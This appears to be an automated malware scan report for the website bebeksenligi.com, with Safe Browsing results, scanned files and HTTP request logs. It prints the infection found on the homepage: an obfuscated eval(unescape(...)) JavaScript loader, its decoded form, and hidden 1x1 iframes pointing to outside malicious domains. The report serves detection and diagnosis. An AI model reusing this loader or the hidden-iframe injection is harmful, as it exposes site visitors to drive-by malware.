Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bebeksenligi.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://bebeksenligi.com/ | 200 OK Content-Length: 18596 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(unescape('%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%68%4F%58%2C%73%6A%63%75%2C%73%70%2C%49%41%76%42%2C%53%56%50%45%2C%74%77%68%29%7B%53%56%50%45%3D%66%75%6E%63%74%69%6F%6E%28%73%70%29%7B%72%65%74%75%72%6E%20%73%70%2E%74%6F%53%74%72%69%6E%67%28%73%6A%63%75%29%7D%3B%69%66%28%21%27%27%2E%72%65%70%6C%61%63%65%28%2F%5E%2F%2C%53%74%72%69%6E%67%29%29%7B%77%68%69%6C%65%28%73%70%2D%2D%29%74%77%68%5B%53%56%50%45%28%73%70%29%5D%3D%49%41%76%42%5B%73%70%5D%7C%7C%53%56%50%45%28%73%70%29%3B%49%41%76%42%3 Decoded script: eval(function(hOX,sjcu,sp,IAvB,SVPE,twh){SVPE=function(sp){return sp.toString(sjcu)};if(!''.replace(/^/,String)){while(sp--)twh[SVPE(sp)]=IAvB[sp]||SVPE(sp);IAvB=[function(SVPE){return twh[SVPE]}];SVPE=function(){return'\\w+'};sp=1};while(sp--)if(IAvB[sp])hOX=hOX.replace(new RegExp('\\b'+SVPE(sp)+'\\b','g'),IAvB[sp]);return hOX}('8.0("<d c=\\"b://a.9/\\" 7=1 6=1 5=\\"4:3;2:e\\">");',15,15,'write||position|hidden|visibility|style|height|width|document|com|aversbonko|http|src|iframe|abs document.write("<iframe src=\"http://aversbonko.com/\" width=1 height=1 style=\"visibility:hidden;position:absolute\">"); document.write("<iframe src=\"http://aversbonko.com/\" width=1 height=1 style=\"visibility:hidden;position:absolute\">"); <iframe src="http://aversbonko.com/" width=1 height=1 style="visibility:hidden;position:absolute"> Antivirus reports:
Hidden iFrame found. size: 1x1 style: hidden src: http://computersengines.com/?vxapy=267b41 <iframe src="http://computersengines.com/?vxapy=267b41" width=1 height=1 style="visibility:hidden;position:absolute"> | ||
http://bebeksenligi.com/AC_RunActiveContent.js | 200 OK Content-Length: 8321 Content-Type: application/x-javascript | clean |
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
http://bebeksenligi.com/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bebeksenligi.com
Result:
HTTP/1.1 200 OK
Date: Sun, 06 Apr 2014 04:05:15 GMT
Accept-Ranges: bytes
ETag: "fa32bf55c659cc1:c0b5"
Server: Microsoft-IIS/6.0
Content-Length: 18596
Content-Location: http://bebeksenligi.com/index.htm
Content-Type: text/html
Last-Modified: Sat, 13 Aug 2011 14:36:06 GMT
X-Powered-By: ASP.NET
...18596 bytes of data.
GET / HTTP/1.1
Host: bebeksenligi.com
Result:
HTTP/1.1 200 OK
Date: Sun, 06 Apr 2014 04:05:15 GMT
Accept-Ranges: bytes
ETag: "fa32bf55c659cc1:c0b5"
Server: Microsoft-IIS/6.0
Content-Length: 18596
Content-Location: http://bebeksenligi.com/index.htm
Content-Type: text/html
Last-Modified: Sat, 13 Aug 2011 14:36:06 GMT
X-Powered-By: ASP.NET
...18596 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: bebeksenligi.com
Referer: http://www.google.com/search?q=bebeksenligi.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bebeksenligi.com
Referer: http://www.google.com/search?q=bebeksenligi.com
Result:
The result is similar to the first query. There are no suspicious redirects found.